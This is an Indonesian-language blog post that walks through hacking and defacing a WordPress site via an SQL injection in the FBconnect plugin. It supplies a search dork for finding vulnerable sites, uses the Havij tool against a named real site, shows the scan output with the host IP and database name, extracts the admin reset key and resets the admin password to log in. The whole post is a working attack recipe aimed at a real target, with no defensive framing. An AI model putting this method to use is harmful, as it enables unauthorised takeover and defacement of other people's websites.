-->
Home Hacking Tutorial Hack/Deface Wordpress

Tutorial Hack/Deface Wordpress

advertise here

Tutorial/Cara Hack/Deface Wordpress Lewat Vuln FBconnect

Bahan:
Quote:Dork : inurl:"fbconnect_action=myhome" << bisa dikembangkan
Tools : Havij
Exploit : Forgot Password
http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin

target:
http://sinjai.linux.or.id/
Quote:http://sinjai.linux.or.id/?fbconnect_act...e&userid=2
ganti jadi:
Quote:http://sinjai.linux.or.id/?fbconnect_act...;tambahkan fb
cukup ditambahkan "fb" sbelum userid
skrang kita scan pake Havij:
Quote:Analyzing http://sinjai.linux.or.id/?fbconnect_act...fbuserid=2
Host IP: 49.50.8.85
Web Server: Apache
Keyword Found: Facebook
Injection type is Integer
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 12
Valid String Column is 6
DB Server: MySQL
Current DB: h80929_wp2

Scan: "wp-user"
activation key -> QbiDH7xcZJT3d53XnKmB&
username -> admin

kemudian buka:
http://sinjai.linux.or.id/wp-login.php
klik lupa password
atau tambahkan <> ?action=lostpassword
Quote:http://sinjai.linux.or.id/wp-login.php?a...stpassword
masukan admin << sebagai username yang ada di table wp-user yang discan melalui havij...

jadi dengan exploit forgot password
http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin
kita kembangkan...
Quote:http://sinjai.linux.or.id/wp-login.php?a...ogin=admin

dan masukan password baru kita..
dan akhirnya login...
Image has been scaled down 2% (1011x759). Click this bar to view original image (1024x768). Click image to open in new window.
[Image: setelahdireset.jpg]
http://sinjai.linux.or.id/wp-login.php
username : admin
password : sesuai yang sudah di reset pinter
Image has been scaled down 26% (1011x569). Click this bar to view original image (1366x768). Click image to open in new window.
[Image: linux.or.id.jpg]
Moga bermanfaat dan membantu sabarsabar
lebih dan kurangx mohon di maafkan
apabila trit ane g penting, repost, dll..
di close aja,. ane ikhlas om. mewek
Next article Next Post
Previous article Previous Post

Click to comment
Subscribe to: Post Comments (Atom)